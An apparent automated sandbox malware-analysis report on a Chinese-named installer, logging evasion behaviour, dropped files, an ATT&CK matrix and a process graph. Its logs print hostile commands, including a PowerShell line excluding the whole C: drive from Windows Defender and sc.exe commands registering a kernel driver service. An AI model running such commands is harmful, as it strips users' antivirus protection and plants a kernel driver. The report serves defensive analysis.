Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6148Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3678Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpWindow / User API: threadDelayed 568Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpWindow / User API: threadDelayed 604Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpWindow / User API: threadDelayed 510Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2DAEC0 FindFirstFileA,FindClose,FindClose,8_2_6C2DAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00976868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00976868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00977496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00977496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00979C60 GetSystemInfo,11_2_00979C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000002.2223931655.00000000004BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C163886 NtSetInformationThread 00000000,00000011,00000000,000000008_2_6C163886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2F0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6C2F0181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_009F57D0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2F9D35 mov eax, dword ptr fs:[00000030h]8_2_6C2F9D35
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2F9D66 mov eax, dword ptr fs:[00000030h]8_2_6C2F9D66
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2EF17D mov eax, dword ptr fs:[00000030h]8_2_6C2EF17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2E8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6C2E8CBD
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2F0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6C2F0181

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.14.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B7720 cpuid 8_2_6C3B7720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0097AB2A GetSystemTimeAsFileTime,11_2_0097AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A10090 GetVersion,11_2_00A10090

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
Windows Service		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution		1
DLL Side-Loading		1
Windows Service		1
Disable or Modify Tools		LSASS Memory421
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API		Logon Script (Windows)111
Process Injection		231
Virtualization/Sandbox Evasion		Security Account Manager231
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials2
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem25
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580230 Sample: #U5b89#U88c5#U52a9#U624b1.0.3.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 88 97 Multi AV Scanner detection for dropped file 2->97 99 Multi AV Scanner detection for submitted file 2->99 101 Found driver which could be used to inject code into processes 2->101 103 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->103 11 #U5b89#U88c5#U52a9#U624b1.0.3.exe 2 2->11         started        14 cmd.exe 2->14         started        16 cmd.exe 2->16         started        18 26 other processes 2->18 process3 file4 95 C:\...\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, PE32 11->95 dropped 20 #U5b89#U88c5#U52a9#U624b1.0.3.tmp 3 5 11->20         started        24 sc.exe 1 14->24         started        26 sc.exe 1 16->26         started        28 sc.exe 1 18->28         started        30 sc.exe 1 18->30         started        32 sc.exe 1 18->32         started        34 22 other processes 18->34 process5 file6 81 C:\Users\user\AppData\Local\...\update.vac, PE32 20->81 dropped 83 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->83 dropped 105 Adds a directory exclusion to Windows Defender 20->105 36 #U5b89#U88c5#U52a9#U624b1.0.3.exe 2 20->36         started        39 powershell.exe 23 20->39         started        42 conhost.exe 24->42         started        44 conhost.exe 26->44         started        46 conhost.exe 28->46         started        48 conhost.exe 30->48         started        50 conhost.exe 32->50         started        52 conhost.exe 34->52         started        54 21 other processes 34->54 signatures7 process8 file9 85 C:\...\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, PE32 36->85 dropped 56 #U5b89#U88c5#U52a9#U624b1.0.3.tmp 4 16 36->56         started        107 Loading BitLocker PowerShell Module 39->107 60 conhost.exe 39->60         started        62 WmiPrvSE.exe 39->62         started        signatures10 process11 file12 87 C:\Users\user\AppData\Local\...\update.vac, PE32 56->87 dropped 89 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 56->89 dropped 91 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 56->91 dropped 93 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 56->93 dropped 109 Query firmware table information (likely to detect VMs) 56->109 111 Protects its processes via BreakOnTermination flag 56->111 113 Hides threads from debuggers 56->113 115 Contains functionality to hide a thread from the debugger 56->115 64 7zr.exe 2 56->64         started        67 cmd.exe 56->67         started        69 7zr.exe 7 56->69         started        signatures13 process14 file15 79 C:\Program Files (x86)\...\tProtect.dll, PE32+ 64->79 dropped 71 conhost.exe 64->71         started        73 sc.exe 1 67->73         started        75 conhost.exe 69->75         started        process16 process17 77 conhost.exe 73->77         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b1.0.3.exe7%VirustotalBrowse
#U5b89#U88c5#U52a9#U624b1.0.3.exe0%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc15%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll6%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-1K545.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\_isetup\_setup64.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b1.0.3.exefalse
      		high
      https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124811659.000000007EE4B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124372052.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2126329450.0000000000821000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000000.2215420602.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.drfalse
        		high
